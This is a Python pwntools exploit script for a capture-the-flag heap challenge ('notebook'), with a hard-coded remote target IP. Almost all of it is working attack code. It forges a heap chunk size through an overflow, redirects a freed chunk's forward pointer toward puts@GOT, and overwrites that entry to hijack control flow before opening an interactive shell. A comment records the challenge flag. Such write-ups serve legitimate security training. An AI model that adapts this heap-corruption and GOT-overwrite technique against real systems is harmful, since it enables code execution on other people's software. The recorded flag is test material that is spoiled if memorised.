- import sys
- import time
- from pwn import *
# Target selection: any extra command-line argument switches the script from
# a local process to the remote service. `flag` only records which mode was
# chosen; nothing in the visible code reads it afterwards.
libc = ELF("./libc-2.27.so")
if len(sys.argv) <= 1:
    flag = 0
    r = process("./notebook", aslr=True)
else:
    flag = 1
    r = remote("125.235.240.172", 1337)
def back():
    """Send menu option 1 once the 'Delete' prompt line has been received."""
    menu_prompt = 'Delete\n'
    r.sendafter(menu_prompt, '1')
def next():
    """Send menu option 2 once the 'Delete' prompt line has been received.

    NOTE: the name shadows the builtin next(); it is kept because main()
    calls the helper by this name.
    """
    menu_prompt = 'Delete\n'
    r.sendafter(menu_prompt, '2')
def add(content):
    """Pick menu option 3, pause briefly, then send *content* unmodified.

    The fixed delay is the only synchronisation before the payload goes out;
    it assumes the program reaches its input read within 0.25 s.
    """
    option = '3'
    r.sendafter('Delete\n', option)
    time.sleep(0.25)  # same quarter-second pause as the bare sleep() call
    r.send(content)
def addbig(content):
    """Pick menu option 4, pause briefly, then send *content* unmodified.

    Same shape as add(); only the menu option differs. The fixed delay is the
    only synchronisation before the payload goes out.
    """
    option = '4'
    r.sendafter('Delete\n', option)
    time.sleep(0.25)  # same quarter-second pause as the bare sleep() call
    r.send(content)
def edit(content):
    """Pick menu option 5, pause briefly, then send *content* unmodified.

    Same shape as add(); only the menu option differs. The fixed delay is the
    only synchronisation before the payload goes out.
    """
    option = '5'
    r.sendafter('Delete\n', option)
    time.sleep(0.25)  # same quarter-second pause as the bare sleep() call
    r.send(content)
def delete():
    """Send menu option 6 once the 'Delete' prompt line has been received."""
    menu_prompt = 'Delete\n'
    r.sendafter(menu_prompt, '6')
def main():
    """Drive the notebook binary through a fixed menu sequence.

    Relies on the module-level connection ``r`` and on the helpers
    add/addbig/edit/delete/back/next. The intent of each step is given by
    the log.info message that precedes it; this function adds no logic of
    its own beyond that ordering. Written for Python 2 / legacy pwntools
    (raw_input, str concatenated with p64 output).
    """
    #malloc 5 chunk
    log.info("A=Malloc 1000")
    add("A")
    log.info("B=Malloc 1000")
    add("B")
    log.info("C=Malloc 1000")
    add("C")
    log.info("D=Malloc 1000")
    add("D")
    log.info("E=Malloc 1000")
    add("E")
    log.info("Move currentNode to D")
    back() #Move currentNode to D
    log.info("Delete D")
    log.info("To make sure the chunk 4 not concat with top chunk")
    delete() #delete
    log.info("Move currentNode to B")
    back() #Move currentNode to B
    log.info("Move currentNode to A")
    back() #Move currentNode to A
    log.info("Set size of B to (sizeB+sizeC+PrevInUse+8)")
    log.info("Make sure fake free chunk has size > size the next malloc")
    edit("A"*(992-8)+p64(2017))
    log.info("Move currentNode to B")
    next()
    log.info("Delete B")
    delete()
    log.info("Move currentNode to C")
    next()
    log.info("Move currentNode to E")
    next()
    log.info("Next malloc will has B pointer so we can overflow the C")
    addbig("F"*(992-8)+p64(0x03f1)+p64(0x0601020 )+p64(0x601010)+"OVERFLOWED")
    log.success("C OVERFLOWED")
    # Three cursor moves without a log message; the position they are meant
    # to reach is only described by the next log.info below.
    next()
    back()
    back()
    log.info("Now C->fd will point to puts@GOT.PLT")
    next()
    log.info("Write &canyouruneme to puts@GOT.PLT")
    # Interactive pause (Python 2 raw_input) before the final edit is sent.
    raw_input("Trigger?")
    edit(p64(0x0400850))
    # Drain whatever the program printed before handing the session over.
    r.recv()
    log.success("Triggered.")
    r.interactive()
    #cat flag
    #matesctf{i6lULX6Z86JHr5UI4MSP}
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()